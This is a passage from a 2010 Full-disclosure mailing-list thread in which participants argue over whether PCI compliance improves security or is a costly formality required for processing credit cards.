 complying with PCI should be cake.

 Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document
 any more secure than having a server facing the wild of the net?

 Truth is, PCI doesn't help in security at all. It is at most a sense of false
 security (and at least serves as a recreational exercise for auditors).

 Thor, I'm not arguing with the article, since I didn't read it, and I won't
 bother to. I just want to point out 

Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christian Sciberras
Payment Gateways are a nice alternative to processing credit cards yourself.
Well, as nice as it gets...

Other than that, it's not me that is being absolutist, but rather seeing
this from a company perspective.

Nobody has ever claimed that PCI makes you secure.
Interesting statement. Why's the need for PCI then? (don't bother with an
answer)

It is a minimal standard which experience has shown most companies need
spelled out for them.
Exactly.
So where was the security again?


On Sat, Apr 24, 2010 at 12:56 AM, BMF badmotherfs...@gmail.com wrote:

 On Fri, Apr 23, 2010 at 3:33 PM, Christian Sciberras uuf6...@gmail.com
 wrote:
  4) I've looked into whether it was in our best interest to use PCI. (it
  was decided that it wasn't worth the trouble)
  At that time, I knew about PCI but not its details, at which point we got
  someone to explain in detail for us.

 This right here screams bullshitter. It isn't as if you get to
 decide if you want to use PCI or not. If you process credit cards with
 the major card brands you are going to do PCI either now or
 eventually. There is no other security standard which you can choose.
 You also show signs of being a victim of absolutism. Nobody has ever
 claimed that PCI makes you secure. It is a minimal standard which
 experience has shown most companies need spelled out for them. There
 is much more than just the things spelled out by PCI that need to be
 done. As usual in these situations, your real complaint isn't about
 PCI but about the people who just don't get the point.


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Thor (Hammer of God)
You spend the time, resources, and money because you are contracted to.  You 
are required to.  You HAVE to.  That's what we've all been getting on about - 
you don't get to choose, you have to if you want to continue to process credit 
card information yourself.

If you want to use a gateway service or other processor, then fine - do that.
No harm, no foul.  You just pay more.  If you want to do it yourself, you have
to be PCI certified.  It's just that simple.

t

From: Christian Sciberras [mailto:uuf6...@gmail.com]
Sent: Friday, April 23, 2010 3:57 PM
To: Thor (Hammer of God)
Cc: Mike Hale; Stephen Mullins; full-disclosure; 
security-bas...@securityfocus.com
Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

I just want to emphasize a point you mentioned right now:

It means companies illustrate a base of practices required to handle consumer 
credit card data.

So why waste resources, time and money when one would be better off with proper 
security measures?
As Mr Hale said, it's a piece of cake if you had the right stuff already going. 
Problem is, it's a piece of expensive cake.

I just want[ed] to make my point clear; I don't see any discussion about this
at all.
As I already said, it is not my intention to argue with the original message.

Cheers.

On Sat, Apr 24, 2010 at 12:46 AM, Thor (Hammer of God) 
t...@hammerofgod.com wrote:
OK - so, when you say "to use PCI" what do you mean?  I get the feeling that
you are equating being "PCI certified" as something people just "get" to show
other people they are "secure."  Hence your use of "marketing propaganda."

People don't go through an audit and get PCI certified so that they can claim
they are secure.  It doesn't work like that.  PCI (Payment Card Industry)
compliance is what people HAVE to do, as in FORCED to do whether they want to
or not, in order to be able to process credit cards.  If you process less than
1 million xactions per year, you can "self audit."  Can you lie?  Sure.  But
you'll get your ability to process payments yanked if they catch you.  More
than that requires an auditor.  If that auditor finds you have horrible
security controls in place, you will fail.  If they pass you anyway, they can
lose their certification to audit.  If you fail, you have x time to get with
the program and be audited again.

It's just a way for the CC industry to make sure the people handling card info
follow best practices for security.  That's all it means - it is a
certification FOR the industry BY the industry.  No one ever said it meant
people had "real security."  It means companies illustrate a base of practices
required to handle consumer credit card data.  That's it.

And I totally agree with Mike Hale's comments about "if you are really secure,
as in 'already secure' then it's cake."  I don't know that I would say "cake"
as it depends on the scope of audit, but he's right.  If you already have a
drive to secure your infrastructure, then PCI should be easy.  My requirements
for security are far more strict than PCI.  Yours may or may not be, so you'll
have to adjust as necessary.

Regarding code, I do believe that in PCI audits for dev that you have to 
illustrate an SDL, in which case things like XSS and BOs and such would be part 
of.

That's the skinny on PCI :)

t

From: Christian Sciberras [mailto:uuf6...@gmail.com]
Sent: Friday, April 23, 2010 3:34 PM

To: Thor (Hammer of God)
Cc: Mike Hale; Stephen Mullins; full-disclosure; 
security-bas...@securityfocus.com

Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

No problem with that.

1) No.
2) Planning to, but no.
3) Heavens no.
4) I've looked into whether it was in our best interest to use PCI. (it was
decided that it wasn't worth the trouble)
At that time, I knew about PCI but not its details, at which point we got 
someone to explain in detail for us.
The end decision wasn't mine, though.
We do take security as a main concern, however, it is preferred to have a more
realistic approach to security rather than restrict employees' access (by
signing some oath...).

Regards,
Christian Sciberras.


On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) 
t...@hammerofgod.com wrote:
Marketing propaganda?  I have no idea what you are talking about.

Before commenting on PCI not helping at all and at the most being a false sense 
of security, let me ask:

1)  Does the company you work for perform PCI audits?

2)  Is the company you work for required to undergo PCI audits?

3)  Are you certified to be able to perform a PCI audit?

4)  Have you ever been directly involved with, as in contributing to, a PCI 
audit, and if so, in what capacity?

I would like to see some truthful expansion on the answers to those questions 
before continuing dialog about if PCI contributes to security or not.

t

From: Christian 

Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christian Sciberras
Hmm. Point taken.

Think I'm getting some sleep...


G'night.





On Sat, Apr 24, 2010 at 1:12 AM, Thor (Hammer of God)
t...@hammerofgod.com wrote:

 You spend the time, resources, and money because you are contracted to.
 You are required to.  You HAVE to.  That’s what we’ve all been getting on
 about – you don’t get to choose, you have to if you want to continue to
 process credit card information yourself.



 If you want to use a gateway service or other processor, then fine – do
 that.  No harm, no foul.  You just pay more.  If you want to do it yourself,
 you have to be PCI certified.  It’s just that simple.



 t



 *From:* Christian Sciberras [mailto:uuf6...@gmail.com]
 *Sent:* Friday, April 23, 2010 3:57 PM

 *To:* Thor (Hammer of God)
 *Cc:* Mike Hale; Stephen Mullins; full-disclosure;
 security-bas...@securityfocus.com
 *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 I just want to emphasize a point you mentioned right now:

 It means companies illustrate a *base* of practices required to handle
 consumer credit card data.

 So why waste resources, time and money when one would be better off with
 proper security measures?
 As Mr Hale said, it's a piece of cake if you had the right stuff already
 going. Problem is, it's a piece of expensive cake.

 I just want[ed] to make my point clear; I don't see any discussion about
 this at all.
 As I already said, it is not my intention to argue with the original
 message.

 Cheers.

 On Sat, Apr 24, 2010 at 12:46 AM, Thor (Hammer of God) 
 t...@hammerofgod.com wrote:

 OK – so, when you say “to use PCI” what do you mean?  I get the feeling
 that you are equating being “PCI certified” as something people just “get”
 to show other people they are “secure.”  Hence your use of “marketing
 propaganda.”



 People don’t go through an audit and get PCI certified so that they can
 claim they are secure.  It doesn’t work like that.  PCI (Payment Card
 Industry) compliance is what people HAVE to do, as in FORCED to do whether
 they want to or not, in order to be able to process credit cards.  If you
 process less than 1 million xactions per year, you can “self audit.”  Can
 you lie?  Sure.  But you’ll get your ability to process payments yanked if
 they catch you.  More than that requires an auditor.  If that auditor finds
 you have horrible security controls in place, you will fail.  If they pass
 you anyway, they can lose their certification to audit.  If you fail, you
 have x time to get with the program and be audited again.



 It’s just a way for the CC industry to make sure the people handling card
 info follow best practices for security.  That’s all it means – it is a
 certification FOR the industry BY the industry.  No one ever said it meant
 people had “real security.”  It means companies illustrate a base of
 practices required to handle consumer credit card data.  That’s it.



 And I totally agree with Mike Hale’s comments about “if you are really
 secure, as in ‘already secure’ then it’s cake.”  I don’t know that I would
 say “cake” as it depends on the scope of audit, but he’s right.  If you
 already have a drive to secure your infrastructure, then PCI should be
 easy.  My requirements for security are far more strict than PCI.  Yours may
 or may not be, so you’ll have to adjust as necessary.



 Regarding code, I do believe that in PCI audits for dev that you have to
 illustrate an SDL, in which case things like XSS and BOs and such would be
 part of.



 That’s the skinny on PCI :)



 t



 *From:* Christian Sciberras [mailto:uuf6...@gmail.com]
 *Sent:* Friday, April 23, 2010 3:34 PM


 *To:* Thor (Hammer of God)

 *Cc:* Mike Hale; Stephen Mullins; full-disclosure;
 security-bas...@securityfocus.com


 *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 No problem with that.

 1) No.
 2) Planning to, but no.
 3) Heavens no.
 4) I've looked into whether it was in our best interest to use PCI. (it
 was decided that it wasn't worth the trouble)
 At that time, I knew about PCI but not its details, at which point we got
 someone to explain in detail for us.
 The end decision wasn't mine, though.
 We do take security as a main concern, however, it is preferred to have a
 more realistic approach to security rather than restrict employees' access
 (by signing some oath...).

 Regards,
 Christian Sciberras.


 On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) 
 t...@hammerofgod.com wrote:

 Marketing propaganda?  I have no idea what you are talking about.



 Before commenting on PCI not helping at all and at the most being a false
 sense of security, let me ask:

 1)  Does the company you work for perform PCI audits?

 2)  Is the company you work for required to undergo PCI audits?

 3)  Are you certified to be able to perform a PCI audit?

 4)  Have you ever been directly involved with, as in contributing to,
 a PCI audit, and if so, in what capacity?



 I would like to see